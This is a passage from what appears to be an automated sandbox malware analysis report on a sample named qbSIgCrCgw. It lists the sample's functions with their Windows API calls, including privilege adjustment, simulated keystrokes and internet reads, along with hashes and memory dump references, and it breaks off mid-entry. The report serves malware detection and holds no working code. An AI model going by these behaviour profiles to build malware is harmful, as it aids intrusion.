                                                                                • FindFirstFileW.KERNEL32(?,?), ref: 003FEB8A
                                                                                • _wcscmp.LIBCMT ref: 003FEBBA
                                                                                • _wcscmp.LIBCMT ref: 003FEBCF
                                                                                • FindNextFileW.KERNEL32(00000000,?), ref: 003FEBE0
                                                                                • FindClose.KERNEL32(00000000,00000001,00000000), ref: 003FEC0E
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: Find$File_wcscmp$CloseFirstNext
                                                                                • String ID:
                                                                                • API String ID: 2387731787-0
                                                                                • Opcode ID: 0be21e1912d3dddc9d248702c45829061f6bcbe4f450402744f52551a8c9152e
                                                                                • Instruction ID: db11cd850cd2842c4f7928f1b37f19d72f771b4743077234f63e0be38a037d3e
                                                                                • Opcode Fuzzy Hash: 0be21e1912d3dddc9d248702c45829061f6bcbe4f450402744f52551a8c9152e
                                                                                • Instruction Fuzzy Hash: 6941BC356042019FCB19DF28C490EAAB3E5FF49324F10456EFA5ACB3A1DB31AD40CB95
                                                                                Function 00418111 Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                                • String ID:
                                                                                • API String ID: 292994002-0
                                                                                • Opcode ID: 707f3170ee8e4614d77dceb400a2a4b8d5066fbcc33fa1789bac17a5d7893b8c
                                                                                • Instruction ID: a7c88d1877f13eedf589dc7c28bdda9c57f1669db8cf3ac15b2eb293d8e9e9ed
                                                                                • Opcode Fuzzy Hash: 707f3170ee8e4614d77dceb400a2a4b8d5066fbcc33fa1789bac17a5d7893b8c
                                                                                • Instruction Fuzzy Hash: C11190327002147BE7211F26EC45EAFBB98EF54760B04442EF949D7251CF34A94386A9
                                                                                Function 003CE01E Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • LoadLibraryA.KERNEL32(kernel32.dll,?,003CE014,75570AE0,003CDEF1,0044DC38,?,?), ref: 003CE02C
                                                                                • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 003CE03E
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: AddressLibraryLoadProc
                                                                                • String ID: GetNativeSystemInfo$kernel32.dll
                                                                                • API String ID: 2574300362-192647395
                                                                                • Opcode ID: a834406a0aef946e71f1c690ce45b0dafb82d5085386b5ce67e6c10d3ea3daf7
                                                                                • Instruction ID: 22d8908bc04fbc6fbf9b718859b44118d0f41c1b66599f2d3cce6b05d4d8e954
                                                                                • Opcode Fuzzy Hash: a834406a0aef946e71f1c690ce45b0dafb82d5085386b5ce67e6c10d3ea3daf7
                                                                                • Instruction Fuzzy Hash: 32D0A731800B22AFCB324F61FD08B1276D4AB00301F29443FE481D2150E7F8CC808B94
                                                                                Function 003C3B70 Relevance: 5.9, Strings: 4, Instructions: 903COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: Exception@8Throwstd::exception::exception
                                                                                • String ID: @$ G$ G$ G
                                                                                • API String ID: 3728558374-1280989995
                                                                                • Opcode ID: 05d1fc9a4c1e4696b7d28c031147210e557505b0c4acd456c6dcf7e7bee917c3
                                                                                • Instruction ID: af4db61a055ce3cb39085c94cb74a5d2175554a017b18776052b7818c13c233c
                                                                                • Opcode Fuzzy Hash: 05d1fc9a4c1e4696b7d28c031147210e557505b0c4acd456c6dcf7e7bee917c3
                                                                                • Instruction Fuzzy Hash: A172BB71E042189FCB16DFA4C481FAEB7B5EF48304F15C06EE90AAB251D734AE45CB95
                                                                                Function 003CB11F Relevance: 4.9, APIs: 3, Instructions: 377COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 003CB34E: GetWindowLongW.USER32(?,000000EB), ref: 003CB35F
                                                                                • DefDlgProcW.USER32(?,?,?,?,?), ref: 003CB22F
                                                                                  • Part of subcall function 003CB55D: DefDlgProcW.USER32(?,00000020,?,00000000), ref: 003CB5A5
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: Proc$LongWindow
                                                                                • String ID:
                                                                                • API String ID: 2749884682-0
                                                                                • Opcode ID: 6e83bcb060ae483d8d2a92afb413c66fc30eab3ac319dbc344b6ae21ba46c301
                                                                                • Instruction ID: 759ad82a6962a65243c87f0626218afbb9bbd64ba17d01cae0d175e9621f75e2
                                                                                • Opcode Fuzzy Hash: 6e83bcb060ae483d8d2a92afb413c66fc30eab3ac319dbc344b6ae21ba46c301
                                                                                • Instruction Fuzzy Hash: F3A17B70214015BADB2AAF2B6C8BFBFB95CEB41344F54491FF401D6A91CB18DC41977A
                                                                                Function 00404EB5 Relevance: 4.7, APIs: 3, Instructions: 155networkfileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,004043BF,00000000), ref: 00404FA6
                                                                                • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00404FD2
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: Internet$AvailableDataFileQueryRead
                                                                                • String ID:
                                                                                • API String ID: 599397726-0
                                                                                • Opcode ID: f3bde4c1698841055a9e8cf7488903b2fe20b051eab4b0d56bb47529a5ca5f15
                                                                                • Instruction ID: 9cfb48063ec5fa1591042155e1ca30d4cfff7185a98c3de78f1128dfa81121af
                                                                                • Opcode Fuzzy Hash: f3bde4c1698841055a9e8cf7488903b2fe20b051eab4b0d56bb47529a5ca5f15
                                                                                • Instruction Fuzzy Hash: D641C7B1504206BFEB119E94DC81EBF77ACEB80754F10403FF705B62C0DA759E419AA8
                                                                                Function 003B77B0 Relevance: 4.6, APIs: 1, Strings: 1, Instructions: 1076COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: _memmove
                                                                                • String ID: \QF
                                                                                • API String ID: 4104443479-2801305206
                                                                                • Opcode ID: ce10fa9231fe8cbc866a8d40d138ef10d6d10c480840846d5428e348dc9652c0
                                                                                • Instruction ID: f72d7971d22c4407c30f78b10eb2c91ffc636ab86a8daf3fe94f00b17d7cf5d8
                                                                                • Opcode Fuzzy Hash: ce10fa9231fe8cbc866a8d40d138ef10d6d10c480840846d5428e348dc9652c0
                                                                                • Instruction Fuzzy Hash: 4DA25A74A04219CFCB25CF58C4806EDBBB5FF88318F2581AAD959AB790D7749E81CF84
                                                                                Function 003FE1FD Relevance: 4.6, APIs: 3, Instructions: 72COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SetErrorMode.KERNEL32(00000001), ref: 003FE20D
                                                                                • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 003FE267
                                                                                • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 003FE2B4
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorMode$DiskFreeSpace
                                                                                • String ID:
                                                                                • API String ID: 1682464887-0
                                                                                • Opcode ID: ec0b329b93e7a0e7bb1a46224bd3e19b9fc1faf8182693987055991615d6ba18
                                                                                • Instruction ID: 4d632ad5221e8b96be4f5b0c67c5f90a382990c0177ee07cd139dd52473a622c
                                                                                • Opcode Fuzzy Hash: ec0b329b93e7a0e7bb1a46224bd3e19b9fc1faf8182693987055991615d6ba18
                                                                                • Instruction Fuzzy Hash: 8A213075A00118EFCB01EFA5D885EEEFBB8FF48314F0484AAE905EB255DB319915CB54
                                                                                Function 003EB134 Relevance: 4.6, APIs: 3, Instructions: 67COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 003CF4EA: std::exception::exception.LIBCMT ref: 003CF51E
                                                                                  • Part of subcall function 003CF4EA: __CxxThrowException@8.LIBCMT ref: 003CF533
                                                                                • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 003EB180
                                                                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 003EB1AD
                                                                                • GetLastError.KERNEL32 ref: 003EB1BA
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                                                • String ID:
                                                                                • API String ID: 1922334811-0
                                                                                • Opcode ID: 80b8c96a89e1c13404810ca89f78f11ba76d91288aba7d707b47550e629d3200
                                                                                • Instruction ID: 2c586ca775f697e21c3c06d065a2adf2c20497e9c6c9dd949e336354cf711e90
                                                                                • Opcode Fuzzy Hash: 80b8c96a89e1c13404810ca89f78f11ba76d91288aba7d707b47550e629d3200
                                                                                • Instruction Fuzzy Hash: AA11CEB2904204AFE71AAF65ECC5D6BF7BDFB44724B20852EE45697240DB70FC418B60
                                                                                Function 003F6606 Relevance: 4.6, APIs: 3, Instructions: 58fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 003F6623
                                                                                • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 003F6664
                                                                                • CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 003F666F
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: CloseControlCreateDeviceFileHandle
                                                                                • String ID:
                                                                                • API String ID: 33631002-0
                                                                                • Opcode ID: eddf3802f0a7c24571036b265f13e0f88f5c6024b6673db8540599e3fd27b9a9
                                                                                • Instruction ID: 92f16db1307aa59fb87aa367c20226268499a91be0de529f6d5d2024d43029cd
                                                                                • Opcode Fuzzy Hash: eddf3802f0a7c24571036b265f13e0f88f5c6024b6673db8540599e3fd27b9a9
                                                                                • Instruction Fuzzy Hash: A5111E71E01228BFDB118FA5EC45BBEBBBCEB45B10F104166F900E7290D7B05E059BA5
                                                                                Function 003F71FA Relevance: 4.5, APIs: 3, Instructions: 42memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 003F7223
                                                                                • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 003F723A
                                                                                • FreeSid.ADVAPI32(?), ref: 003F724A
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                                • String ID:
                                                                                • API String ID: 3429775523-0
                                                                                • Opcode ID: 78c78a0783589d480dbdde54bed51ab4f126e63613a06f5b614f717368a78c22
                                                                                • Instruction ID: 122ffabdb010a2733e9146ae2a0fdf0c00ed8610221ae53d21fde7967d7fded1
                                                                                • Opcode Fuzzy Hash: 78c78a0783589d480dbdde54bed51ab4f126e63613a06f5b614f717368a78c22
                                                                                • Instruction Fuzzy Hash: D6F01275D14209BFDF04DFF4DD89AEDBBB8EF08605F105469A602E2191E27056448B14
                                                                                Function 003FF56F Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • FindFirstFileW.KERNEL32(?,?), ref: 003FF599
                                                                                • FindClose.KERNEL32(00000000), ref: 003FF5C9
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: Find$CloseFileFirst
                                                                                • String ID:
                                                                                • API String ID: 2295610775-0
                                                                                • Opcode ID: e334d4250967367ba91818f54c24f477ceeae832be7e7aaeb6d411ae26634847
                                                                                • Instruction ID: 36dfe0e8c7e59a302a9c8d43d0264d1dc9eb38e0fa3b1ff29285817bf4f4dae7
                                                                                • Opcode Fuzzy Hash: e334d4250967367ba91818f54c24f477ceeae832be7e7aaeb6d411ae26634847
                                                                                • Instruction Fuzzy Hash: DC11A1316042049FDB01EF28D845A2EB3E8FF85324F00892EF9A9DB291CB30AD008B85
                                                                                Function 003FCE7A Relevance: 3.0, APIs: 2, Instructions: 30windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,0040BE6A,?,?,00000000,?), ref: 003FCEA7
                                                                                • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,0040BE6A,?,?,00000000,?), ref: 003FCEB9
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorFormatLastMessage
                                                                                • String ID:
                                                                                • API String ID: 3479602957-0
                                                                                • Opcode ID: d106099322b7a290727881e07836f43ad41732b704dbc96004fbefdb2175957b
                                                                                • Instruction ID: 1546e4591f7bcab7bd29c769e297c1b39b451aa9ca219ecc8bd1118544fccf12
                                                                                • Opcode Fuzzy Hash: d106099322b7a290727881e07836f43ad41732b704dbc96004fbefdb2175957b
                                                                                • Instruction Fuzzy Hash: 41F0823151022DEBDB21ABA4DC49FFA776DBF08351F004165F915D6181D630DA50CBA1
                                                                                Function 003F411C Relevance: 3.0, APIs: 2, Instructions: 29keyboardCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 003F4153
                                                                                • keybd_event.USER32(?,76C1C0D0,?,00000000), ref: 003F4166
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: InputSendkeybd_event
                                                                                • String ID:
                                                                                • API String ID: 3536248340-0
                                                                                • Opcode ID: c0ab556b7fddca0cf0e1f43ab13ee138a032f2beff640308fbae8c4fa3e19267
                                                                                • Instruction ID: 516fd719b9760f8e6c7731a7ec411d88c8f88ad7838725d8b9463422587d9524
                                                                                • Opcode Fuzzy Hash: c0ab556b7fddca0cf0e1f43ab13ee138a032f2beff640308fbae8c4fa3e19267
                                                                                • Instruction Fuzzy Hash: 03F0677080024DAFDB068FA0C805BBEBBB4EF00305F00801AF966A6292D77986129FA4
                                                                                Function 003EAB84 Relevance: 3.0, APIs: 2, Instructions: 22COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,003EACC0), ref: 003EAB99
                                                                                • CloseHandle.KERNEL32(?,?,003EACC0), ref: 003EABAB
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: AdjustCloseHandlePrivilegesToken
                                                                                • String ID:
                                                                                • API String ID: 81990902-0
                                                                                • Opcode ID: eeaba61b19fd2ad43865beba0ea1cfa71e4ce4380d1305a5b28df6c201529216
                                                                                • Instruction ID: e14dce1ff643a3e62eb839b4e5fa04a4b7a0a798ddfb1e69446e8137a08d0278
                                                                                • Opcode Fuzzy Hash: eeaba61b19fd2ad43865beba0ea1cfa71e4ce4380d1305a5b28df6c201529216
                                                                                • Instruction Fuzzy Hash: 18E0E671004511AFE7262F55FC05DB77BEAEF04320B10853DF95AC5470D7626C90DB50
                                                                                Function 003D81AC Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000,0000000E,003D6DB3,-0000031A,?,?,00000001), ref: 003D81B1
                                                                                • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 003D81BA
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: ExceptionFilterUnhandled
                                                                                • String ID:
                                                                                • API String ID: 3192549508-0
                                                                                • Opcode ID: cedd5cbefb4bd6fdc607f3cfad6db251116cdaef6fa9865e1f998fab9c8bddb4
                                                                                • Instruction ID: 69f2ab83ca2b83eb4b2a1c6c07e4659e89f5d046bd23ba2d16fa326588fbba1a
                                                                                • Opcode Fuzzy Hash: cedd5cbefb4bd6fdc607f3cfad6db251116cdaef6fa9865e1f998fab9c8bddb4
                                                                                • Instruction Fuzzy Hash: EFB09231444608ABDB002BA1FC09B987F68EB08652F005030FA0D450618B7258208A9A
                                                                                Function 003C3200 Relevance: 2.2, Strings: 1, Instructions: 986COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
